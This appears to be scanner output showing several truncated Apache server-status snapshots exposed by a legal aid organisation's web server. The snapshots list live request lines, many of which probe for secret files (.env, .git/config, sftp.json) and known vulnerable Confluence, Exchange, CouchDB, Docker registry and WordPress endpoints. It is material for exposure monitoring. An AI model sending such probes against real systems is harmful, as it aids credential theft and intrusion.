15.158.40.169http/1.1events.alas.org:8080GET / HTTP/1.1 20-173283174/4/23858W 0.55005.40.01343.40 15.158.40.169http/1.1intranet.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 21-173283222/2/21614K 0.57046352.50.00352.10 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 22-173283244/4/22300K 0.16016519.10.01291.02 15.158.40.169http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 23-173283284/4/19979K 0.8800234.70.23307.87 15.158.40.169http/1.1elearning.alas.org:8080GET /login.action HTTP/1.1 24-173283295/5/19374K 0.54005.50.01221.26 15.158.40.169http/1.1elearning.alas.org:8080GET /.DS_Store HTTP/1.1 25-173283501/1/9225K 0.57045911.00.00167.37 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 26-173283515/5/9156K 0.010116.20.02158.77 15.158.40.169http/1.1short.alas.org:8080GET /server-status HTTP/1.1 27-173283551/1/10354K 0.56046831.00.00141.57 15.158.40.167http/1.1intranet.alas.org:8080GET / HTTP/1.1 28-173283570/0/7823W 0.00400.00.00108.15 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 29-173283582/2/7601K 0.55002.10.00116.48 15.158.40.167http/1.1elearning.alas.org:8080GET /s/7343e24393e2933323e28313/_/;/META-INF/maven/com.atlassia 30-173283592/2/7567W 0.250034.40.03119.56 15.158.40.169http/1.1elearning.alas.org:8080GET / HTTP/1.1 31-173283604/4/7172K 0.240035.30.0399.70 15.158.40.169http/1.1short.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 32-173283613/3/7508W 0.240034.30.03113.97 15.158.40.169http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 33-173283624/4/7361K 0.26010241.10.04120.92 15.158.40.169http/1.1esign.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 34-173283635/5/7196K 0.250037.70.0483.21 15.158.40.169http/1.1on.alas.org:8080GET /s/630313e24393e2933323e28313/_/;/META-INF/maven/com.atlass 35-173283644/4/6604W 0.270036.80.0494.44 15.158.40.169http/1.1survey.alas.org:8080GET /about HTTP/1.1 36-173283745/5/7035K 0.13005.30.01111.96 15.158.40.169http/1.1elearning.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 37-173283845/5/9948K 0.160287.70.01115.63 15.158.40.169http/1.1esign.alas.org:8080GET /_all_dbs HTTP/1.1 38-173283855/5/7040W 0.13005.10.0084.85 15.158.40.137http/1.1survey.alas.org:8080GET / HTTP/1.1 39-173284127/7/7766K 0.030011.90.01112.21 15.158.40.137http/1.1on.alas.org:8080GET / HTTP/1.1 40-173284131/1/6210K 0.56045011.00.0067.85 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 41-173284300/2/3663_ 0.26026370.00.0335.03 15.158.40.167http/1.1elearning.alas.org:8080GET / HTTP/1.1 42-173284312/2/4082K 0.250033.20.0343.14 15.158.40.169http/1.1short.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 43-173284320/0/2172W 0.00300.00.0019.08 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 44-173284353/3/1440K 0.15004.30.0014.61 15.158.40.169http/1.1elearning.alas.org:8080GET /_all_dbs HTTP/1.1 45-173284384/4/2283K 0.150110.60.0129.78 15.158.40.169http/1.1on.alas.org:8080GET /server-status HTTP/1.1 46-173284394/4/1525W 0.00004.20.0013.03 15.158.40.169http/1.1esign.alas.org:8080GET /s/630313e24393e2933323e28313/_/;/META-INF/maven/com.atlass 47-173284400/0/1391W 1.53300.00.0024.14 15.158.40.137http/1.1intranet.alas.org:8080GET / HTTP/1.1 48-173284414/4/2064K 0.13004.00.0030.27 15.158.40.167http/1.1secure.alas.org:8080GET /login.action HTTP/1.1 49-173284542/2/2274K 0.250033.20.0320.97 15.158.40.167http/1.1secure.alas.org:8080GET /_all_dbs HTTP/1.1 50-173284552/2/1235W 0.240033.20.0324.81 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 51-173284800/2/1230W 0.25100.00.0316.60 15.158.40.167http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 52-173284814/4/1382K 0.09009.40.0118.47 15.158.40.169http/1.1esign.alas.org:8080GET
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b02141655373
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Thursday, 12-Oct-2023 00:03:20 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 174 Parent Server MPM Generation: 173 Server uptime: 173 days 8 hours 19 minutes 21 seconds Server load: 2.63 0.57 0.18 Total accesses: 2869819 - Total Traffic: 40.6 GB CPU Usage: u52.46 s9.35 cu0 cs0 - .000413% CPU load .192 requests/sec - 2913 B/second - 14.8 kB/request 103 requests currently being processed, 34 idle workers KWWKWWWWW_KKKKK_WKKWWWKWKKWK_K_WKKKWKWKKW_KWKKWWKKWKKKKK_KKWWK_W WKKKKWKWK__WKKKKWWKKKKKKWKKKKKKKKWWKKKWKKKKKCKWK________________ _________............. Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-1732827411/11/207944K 0.6404124.30.023020.18 15.158.40.169http/1.1esign.alas.org:8080GET /telescope/requests HTTP/1.1 1-173280084/28/202806W 1.6840235.30.643048.77 15.158.40.169http/1.1intranet.alas.org:8080GET /v2/_catalog HTTP/1.1 2-173282316/10/193266W 1.0850277.10.282925.37 15.158.40.169http/1.1events.alas.org:8080GET / HTTP/1.1 3-1732823814/17/192753K 1.400092.60.092785.50 15.158.40.169http/1.1on.alas.org:8080GET /_all_dbs HTTP/1.1 4-173281677/18/189271W 2.140017.20.532738.83 15.158.40.169http/1.1survey.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 5-173271296/89/182603W 6.614047.42.032658.93 15.158.40.137http/1.1events.alas.org:8080GET / HTTP/1.1 6-173282396/8/173977W 1.8600238.70.242649.58 15.158.40.169http/1.1elearning.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 7-1732803510/28/175017W 1.3020282.90.352529.96 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 8-173280364/21/158525W 1.7610275.10.402531.52 15.158.40.169http/1.1intranet.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 9-173282790/7/156098_ 0.45227930.00.122027.58 15.158.40.169http/1.1elearning.alas.org:8080GET / HTTP/1.1 10-173281684/16/138955K 2.48167041.20.242080.48 15.158.40.169http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 11-1732828010/10/119546K 0.130055.80.051807.14 15.158.40.169http/1.1short.alas.org:8080GET /.env HTTP/1.1 12-1732769713/58/114562K 3.010069.40.661606.26 15.158.40.169http/1.1elearning.alas.org:8080GET /lib/editor/tiny/loader.php?rev=abc&filepath=hello.css HTTP 13-173282898/8/83329K 0.090048.60.051118.03 15.158.40.169http/1.1short.alas.org:8080GET /telescope/requests HTTP/1.1 14-173282903/5/70270K 1.38003.30.32922.44 15.158.40.167http/1.1elearning.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 15-173282950/3/71095_ 0.56226040.00.10966.01 15.158.40.169http/1.1elearning.alas.org:8080GET / HTTP/1.1 16-173282966/6/58181W 0.100011.90.01820.15 15.158.40.169http/1.1survey.alas.org:8080GET / HTTP/1.1 17-173283096/6/33838K 0.330043.70.04465.86 15.158.40.169http/1.1elearning.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 18-173283106/6/24065K 0.17086551.40.05337.94 15.158.40.169http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 19-173283161/1/23457W 0.00501.40.00388.61 15.158.40.169http/1.1events.alas.org:8080GET / HTTP/1.1 20-173283174/4/23858W 0.55105.40.01343.40 15.158.40.169http/1.1intranet.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 21-173283222/2/21614W 0.57002.50.00352.10 15.158.40.169http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 22-173283245/5/22301K 0.23080015.10.01291.03 15.158.40.169http/1.1survey.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 23-173283285/5/19980W 0.8800235.70.23307.87 15.158.40.169http/1.1survey.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 24-173283298/8/19377K 0.54008.90.01221.26 15.158.40.169http/1.1short.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 25-173283502/2/9226K 0.57017.40.01167.37 15.158.40.169http/1.1short.alas.org:8080GET /server-status HTTP/1.1 26-173283515/5/9156W 0.010016.20.02158.77 15.158.40.169http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 27-173283551/1/10354K 0.56146831.00.00141.57 15.158.40.167http/1.1intranet.alas.org:8080GET / HTTP/1.1 28-173283570/1/7824_ 0.57150440.00.00108.15 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 29-173283582/2/7601K 0.55102.10.00116.48 15.158.40.167http/1.1elearning.alas.org:8080GET /s/7343e24393e2933323e28313/_/;/META-INF/maven/com.atlassia 30-173283590/3/7568_ 0.50019640.00.07119.59 15.158.40.169http/1.1elearning.alas.org:8080GET / HTTP/1.1 31-173283605/5/7173W 0.240036.30.0499.70 15.158.40.169http/1.1survey.alas.org:8080GET /server-status HTTP/1.1 32-173283614/4/7509K 0.370120935.30.03113.98 15.158.40.169http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 33-173283625/5/7362K 0.34062046.90.05120.93 15.158.40.169http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 34-173283638/8/7199K 0.250040.90.0483.21 15.158.40.169http/1.1on.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 35-173283645/5/6605W 0.360042.60.0494.45 15.158.40.169http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 36-173283748/8/7038K 0.15009.70.01111.97 15.158.40.169http/1.1elearning.alas.org:8080GET /lib/editor/tiny/loader.php?rev=abc&filepath=hello.css HTTP 37-173283845/5/9948W 0.16107.70.01115.63 15.158.40.169http/1.1elearning.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 38-173283856/6/7041K 0.23186546.50.0584.89 15.158.40.137http/1.1survey.alas.org:8080GET / HTTP/1.1 39-173284128/8/7767K 0.031013.00.01112.21 15.158.40.137http/1.1secure.alas.org:8080GET /s/4323e24393e2933323e28313/_/;/META-INF/maven/com.atlassia 40-173284132/2/6211W 0.56002.10.0067.85 15.158.40.169http/1.1short.alas.org:8080GET /server-status HTTP/1.1 41-173284300/2/3663_ 0.26226370.00.0335.03 15.158.40.167http/1.1elearning.alas.org:8080GET / HTTP/1.1 42-173284313/3/4083K 0.2604735.50.0343.14 15.158.40.169http/1.1esign.alas.org:8080GET /telescope/requests HTTP/1.1 43-173284320/0/2172W 0.00500.00.0019.08 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 44-173284354/4/1441K 0.15005.40.0114.61 15.158.40.169http/1.1short.alas.org:8080GET /v2/_catalog HTTP/1.1 45-173284386/6/2285K 0.150012.70.0129.78 15.158.40.169http/1.1short.alas.org:8080GET /login.action HTTP/1.1 46-173284395/5/1526W 0.01006.60.0113.04 15.158.40.169http/1.1survey.alas.org:8080GET / HTTP/1.1 47-173284400/0/1391W 1.53500.00.0024.14 15.158.40.137http/1.1intranet.alas.org:8080GET / HTTP/1.1 48-173284414/4/2064K 0.13104.00.0030.27 15.158.40.167http/1.1secure.alas.org:8080GET /login.action HTTP/1.1 49-173284542/2/2274K 0.251033.20.0320.97 15.158.40.167http/1.1secure.alas.org:8080GET /_all_dbs HTTP/1.1 50-173284552/2/1235W 0.241033.20.0324.81 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 51-173284801/3/1231K 0.38015181.00.0316.60 15.158.40.167http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 52-173284816/6/1384K 0.090011
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b021020c22b3
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Thursday, 12-Oct-2023 00:03:19 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 174 Parent Server MPM Generation: 173 Server uptime: 173 days 8 hours 19 minutes 20 seconds Server load: 2.63 0.57 0.18 Total accesses: 2869787 - Total Traffic: 40.6 GB CPU Usage: u51.32 s9.14 cu0 cs0 - .000404% CPU load .192 requests/sec - 2913 B/second - 14.8 kB/request 106 requests currently being processed, 31 idle workers KWWKKWKWW_KKKKK_KKWWWKWKKWKK_KWKWWKWKWKKK_KWKKWWKKWKKKKK_KKWWKWK KKKKKWKWKW_WKKKKWWKKKKKKWKWKKKKKKWWKKKWKKKKKCKWK________________ _________............. Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-1732827410/10/207943K 0.630022.00.023020.18 15.158.40.169http/1.1elearning.alas.org:8080GET /config.json HTTP/1.1 1-173280084/28/202806W 1.6840235.30.643048.77 15.158.40.169http/1.1intranet.alas.org:8080GET /v2/_catalog HTTP/1.1 2-173282316/10/193266W 1.0840277.10.282925.37 15.158.40.169http/1.1events.alas.org:8080GET / HTTP/1.1 3-1732823813/16/192752K 1.400091.50.092785.50 15.158.40.169http/1.1short.alas.org:8080GET /.git/config HTTP/1.1 4-173281677/18/189271K 2.140017.20.532738.83 15.158.40.169http/1.1short.alas.org:8080GET /.env HTTP/1.1 5-173271296/89/182603W 6.614047.42.032658.93 15.158.40.137http/1.1events.alas.org:8080GET / HTTP/1.1 6-173282396/8/173977K 1.86067238.70.242649.58 15.158.40.169http/1.1esign.alas.org:8080GET /login.action HTTP/1.1 7-1732803510/28/175017W 1.3010282.90.352529.96 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 8-173280364/21/158525W 1.7610275.10.402531.52 15.158.40.169http/1.1intranet.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 9-173282790/7/156098_ 0.45127930.00.122027.58 15.158.40.169http/1.1elearning.alas.org:8080GET / HTTP/1.1 10-173281684/16/138955K 2.48067041.20.242080.48 15.158.40.169http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 11-173282809/9/119545K 0.130051.40.051807.14 15.158.40.169http/1.1elearning.alas.org:8080GET /s/9393e24393e2933323e28313/_/;/META-INF/maven/com.atlassia 12-1732769712/57/114561K 3.0104568.40.661606.26 15.158.40.169http/1.1esign.alas.org:8080GET /config.json HTTP/1.1 13-173282897/7/83328K 0.090047.60.051118.03 15.158.40.169http/1.1short.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 14-173282902/4/70269K 1.38102.30.32922.44 15.158.40.167http/1.1secure.alas.org:8080GET /.env HTTP/1.1 15-173282950/3/71095_ 0.56126040.00.10966.01 15.158.40.169http/1.1elearning.alas.org:8080GET / HTTP/1.1 16-173282966/6/58181K 0.10095311.90.01820.15 15.158.40.169http/1.1survey.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 17-173283095/5/33837K 0.3307442.60.04465.86 15.158.40.169http/1.1esign.alas.org:8080GET /.DS_Store HTTP/1.1 18-173283105/5/24064W 0.100045.50.04337.93 15.158.40.169http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 19-173283161/1/23457W 0.00501.40.00388.61 15.158.40.169http/1.1events.alas.org:8080GET / HTTP/1.1 20-173283174/4/23858W 0.55005.40.01343.40 15.158.40.169http/1.1intranet.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 21-173283222/2/21614K 0.57046352.50.00352.10 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 22-173283244/4/22300W 0.16009.10.01291.02 15.158.40.169http/1.1survey.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 23-173283285/5/19980K 0.8800235.70.23307.87 15.158.40.169http/1.1elearning.alas.org:8080GET /.env HTTP/1.1 24-173283297/7/19376K 0.54077.80.01221.26 15.158.40.169http/1.1secure.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 25-173283501/1/9225W 0.57001.00.00167.37 15.158.40.169http/1.1short.alas.org:8080GET /server-status HTTP/1.1 26-173283515/5/9156K 0.010116.20.02158.77 15.158.40.169http/1.1short.alas.org:8080GET /server-status HTTP/1.1 27-173283551/1/10354K 0.56046831.00.00141.57 15.158.40.167http/1.1intranet.alas.org:8080GET / HTTP/1.1 28-173283570/1/7824_ 0.57050440.00.00108.15 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 29-173283582/2/7601K 0.55002.10.00116.48 15.158.40.167http/1.1elearning.alas.org:8080GET /s/7343e24393e2933323e28313/_/;/META-INF/maven/com.atlassia 30-173283592/2/7567W 0.251034.40.03119.56 15.158.40.169http/1.1elearning.alas.org:8080GET / HTTP/1.1 31-173283605/5/7173K 0.240036.30.0499.70 15.158.40.169http/1.1elearning.alas.org:8080GET /.DS_Store HTTP/1.1 32-173283613/3/7508W 0.241034.30.03113.97 15.158.40.169http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 33-173283624/4/7361W 0.260041.10.04120.92 15.158.40.169http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 34-173283637/7/7198K 0.250039.80.0483.21 15.158.40.169http/1.1on.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 35-173283644/4/6604W 0.270036.80.0494.44 15.158.40.169http/1.1survey.alas.org:8080GET /about HTTP/1.1 36-173283747/7/7037K 0.150288.60.01111.97 15.158.40.169http/1.1esign.alas.org:8080GET /telescope/requests HTTP/1.1 37-173283845/5/9948W 0.16007.70.01115.63 15.158.40.169http/1.1elearning.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 38-173283856/6/7041K 0.23086546.50.0584.89 15.158.40.137http/1.1survey.alas.org:8080GET / HTTP/1.1 39-173284128/8/7767K 0.030013.00.01112.21 15.158.40.137http/1.1secure.alas.org:8080GET /s/4323e24393e2933323e28313/_/;/META-INF/maven/com.atlassia 40-173284132/2/6211K 0.56002.10.0067.85 15.158.40.169http/1.1short.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 41-173284300/2/3663_ 0.26126370.00.0335.03 15.158.40.167http/1.1elearning.alas.org:8080GET / HTTP/1.1 42-173284313/3/4083K 0.2604735.50.0343.14 15.158.40.169http/1.1esign.alas.org:8080GET /telescope/requests HTTP/1.1 43-173284320/0/2172W 0.00400.00.0019.08 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 44-173284353/3/1440K 0.15104.30.0014.61 15.158.40.169http/1.1elearning.alas.org:8080GET /_all_dbs HTTP/1.1 45-173284385/5/2284K 0.150011.60.0129.78 15.158.40.169http/1.1secure.alas.org:8080GET /telescope/requests HTTP/1.1 46-173284395/5/1526W 0.01006.60.0113.04 15.158.40.169http/1.1survey.alas.org:8080GET / HTTP/1.1 47-173284400/0/1391W 1.53400.00.0024.14 15.158.40.137http/1.1intranet.alas.org:8080GET / HTTP/1.1 48-173284414/4/2064K 0.13104.00.0030.27 15.158.40.167http/1.1secure.alas.org:8080GET /login.action HTTP/1.1 49-173284542/2/2274K 0.251033.20.0320.97 15.158.40.167http/1.1secure.alas.org:8080GET /_all_dbs HTTP/1.1 50-173284552/2/1235W 0.240033.20.0324.81 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 51-173284801/3/1231K 0.38015181.00.0316.60 15.158.40.167http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 52-173284815/5/1383K 0.090010.50.0118.47 15.158.40.169http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b0212c534eee
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Thursday, 12-Oct-2023 00:03:18 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 174 Parent Server MPM Generation: 173 Server uptime: 173 days 8 hours 19 minutes 19 seconds Server load: 0.25 0.07 0.02 Total accesses: 2869721 - Total Traffic: 40.6 GB CPU Usage: u50.08 s8.88 cu0 cs0 - .000394% CPU load .192 requests/sec - 2913 B/second - 14.8 kB/request 107 requests currently being processed, 30 idle workers KWWKKWKWW_WKKKK_WKKWKKKKKKWKWKWKWKKKKKWKK_KWKKKWKKKWKKWK_KKWWKWK KKKKKWKKKWWWKKKKWWKKKKKKWKKKWKKKKWWKKKWKKKKK_KKW________________ _________............. Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-173282749/9/207942K 0.630121.00.023020.18 15.158.40.169http/1.1elearning.alas.org:8080GET /server-status HTTP/1.1 1-173280084/28/202806W 1.6830235.30.643048.77 15.158.40.169http/1.1intranet.alas.org:8080GET /v2/_catalog HTTP/1.1 2-173282316/10/193266W 1.0830277.10.282925.37 15.158.40.169http/1.1events.alas.org:8080GET / HTTP/1.1 3-1732823811/14/192750K 1.400089.40.092785.50 15.158.40.169http/1.1secure.alas.org:8080GET /telescope/requests HTTP/1.1 4-173281675/16/189269K 2.140119711.80.532738.83 15.158.40.169http/1.1survey.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 5-173271296/89/182603W 6.613047.42.032658.93 15.158.40.137http/1.1events.alas.org:8080GET / HTTP/1.1 6-173282396/8/173977K 1.86067238.70.242649.58 15.158.40.169http/1.1esign.alas.org:8080GET /login.action HTTP/1.1 7-1732803510/28/175017W 1.3000282.90.352529.96 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 8-173280364/21/158525W 1.7600275.10.402531.52 15.158.40.169http/1.1intranet.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 9-173282790/7/156098_ 0.45027930.00.122027.58 15.158.40.169http/1.1elearning.alas.org:8080GET / HTTP/1.1 10-173281683/15/138954W 2.400035.40.242080.48 15.158.40.169http/1.1survey.alas.org:8080GET /v2/_catalog HTTP/1.1 11-173282807/7/119543K 0.130049.30.051807.13 15.158.40.169http/1.1elearning.alas.org:8080GET /.env HTTP/1.1 12-1732769710/55/114559K 3.000059.70.651606.25 15.158.40.169http/1.1short.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 13-173282897/7/83328K 0.090047.60.051118.03 15.158.40.169http/1.1short.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 14-173282902/4/70269K 1.38002.30.32922.44 15.158.40.167http/1.1secure.alas.org:8080GET /.env HTTP/1.1 15-173282950/3/71095_ 0.56026040.00.10966.01 15.158.40.169http/1.1elearning.alas.org:8080GET / HTTP/1.1 16-173282965/5/58180W 0.01006.00.01820.15 15.158.40.169http/1.1survey.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 17-173283094/4/33836K 0.320040.30.04465.86 15.158.40.169http/1.1elearning.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 18-173283105/5/24064K 0.100045.50.04337.93 15.158.40.169http/1.1elearning.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 19-173283161/1/23457W 0.00401.40.00388.61 15.158.40.169http/1.1events.alas.org:8080GET / HTTP/1.1 20-173283174/4/23858K 0.55005.40.01343.40 15.158.40.169http/1.1on.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 21-173283222/2/21614K 0.57046352.50.00352.10 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 22-173283244/4/22300K 0.16016519.10.01291.02 15.158.40.169http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 23-173283283/3/19978K 0.8801689233.60.23307.87 15.158.40.169http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 24-173283295/5/19374K 0.54005.50.01221.26 15.158.40.169http/1.1elearning.alas.org:8080GET /.DS_Store HTTP/1.1 25-173283501/1/9225K 0.57045911.00.00167.37 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 26-173283514/4/9155W 0.01009.90.01158.76 15.158.40.169http/1.1short.alas.org:8080GET /server-status HTTP/1.1 27-173283551/1/10354K 0.56046831.00.00141.57 15.158.40.167http/1.1intranet.alas.org:8080GET / HTTP/1.1 28-173283570/0/7823W 0.00400.00.00108.15 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 29-173283581/1/7600K 0.55038591.00.00116.48 15.158.40.167http/1.1intranet.alas.org:8080GET / HTTP/1.1 30-173283592/2/7567W 0.250034.40.03119.56 15.158.40.169http/1.1elearning.alas.org:8080GET / HTTP/1.1 31-173283604/4/7172K 0.240035.30.0399.70 15.158.40.169http/1.1short.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 32-173283613/3/7508W 0.240034.30.03113.97 15.158.40.169http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 33-173283624/4/7361K 0.26010241.10.04120.92 15.158.40.169http/1.1esign.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 34-173283634/4/7195K 0.250036.60.0483.21 15.158.40.169http/1.1on.alas.org:8080GET /_all_dbs HTTP/1.1 35-173283644/4/6604K 0.270036.80.0494.44 15.158.40.169http/1.1survey.alas.org:8080GET /.vscode/sftp.json HTTP/1.1 36-173283745/5/7035K 0.13005.30.01111.96 15.158.40.169http/1.1elearning.alas.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 37-173283844/4/9947K 0.15005.30.01115.63 15.158.40.169http/1.1secure.alas.org:8080GET /.git/config HTTP/1.1 38-173283855/5/7040W 0.13005.10.0084.85 15.158.40.137http/1.1survey.alas.org:8080GET / HTTP/1.1 39-173284127/7/7766K 0.030011.90.01112.21 15.158.40.137http/1.1on.alas.org:8080GET / HTTP/1.1 40-173284131/1/6210K 0.56045011.00.0067.85 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 41-173284300/2/3663_ 0.26026370.00.0335.03 15.158.40.167http/1.1elearning.alas.org:8080GET / HTTP/1.1 42-173284312/2/4082K 0.250033.20.0343.14 15.158.40.169http/1.1short.alas.org:8080GET /debug/default/view?panel=config HTTP/1.1 43-173284320/0/2172W 0.00300.00.0019.08 15.158.40.169http/1.1intranet.alas.org:8080GET / HTTP/1.1 44-173284353/3/1440K 0.15004.30.0014.61 15.158.40.169http/1.1elearning.alas.org:8080GET /_all_dbs HTTP/1.1 45-173284383/3/2282K 0.150504.30.0029.77 15.158.40.169http/1.1esign.alas.org:8080GET /.DS_Store HTTP/1.1 46-173284394/4/1525K 0.00004.20.0013.03 15.158.40.169http/1.1short.alas.org:8080GET / HTTP/1.1 47-173284400/0/1391W 1.53300.00.0024.14 15.158.40.137http/1.1intranet.alas.org:8080GET / HTTP/1.1 48-173284414/4/2064K 0.13004.00.0030.27 15.158.40.167http/1.1secure.alas.org:8080GET /login.action HTTP/1.1 49-173284542/2/2274K 0.250033.20.0320.97 15.158.40.167http/1.1secure.alas.org:8080GET /_all_dbs HTTP/1.1 50-173284552/2/1235K 0.240033.20.0324.81 15.158.40.169http/1.1elearning.alas.org:8080GET /about HTTP/1.1 51-173284800/2/1230W 0.25000.00.0316.60 15.158.40.167http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 52-173284813/3/1381K 0.09008.40.0118.47 15.158.40.169http/1.1short.alas.org:8080
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312a30b0212a30b021cfbe8de3
Apache Status Apache Server Status for short.alas.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2023-03-08T17:34:33 Current Time: Tuesday, 13-Jun-2023 23:38:10 UTC Restart Time: Friday, 21-Apr-2023 15:43:58 UTC Parent Server Config. Generation: 54 Parent Server MPM Generation: 53 Server uptime: 53 days 7 hours 54 minutes 11 seconds Server load: 6.10 1.28 0.41 Total accesses: 671695 - Total Traffic: 11.7 GB CPU Usage: u163.05 s17.29 cu0 cs0 - .00391% CPU load .146 requests/sec - 2729 B/second - 18.3 kB/request 129 requests currently being processed, 8 idle workers KKKKKKWKWKWKKWWWWKKKWKKW__K_K_KK_KKK_KK__WKWWKWKKKWWKKWKWWKWWKWK WWKWKWWKWKWKKWWWWKWWKKKKWWKWWKWWKWWKKKKKKWWKKKKKKKKKKKWKWWKKWWWK WKKWWWWKW............. Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU 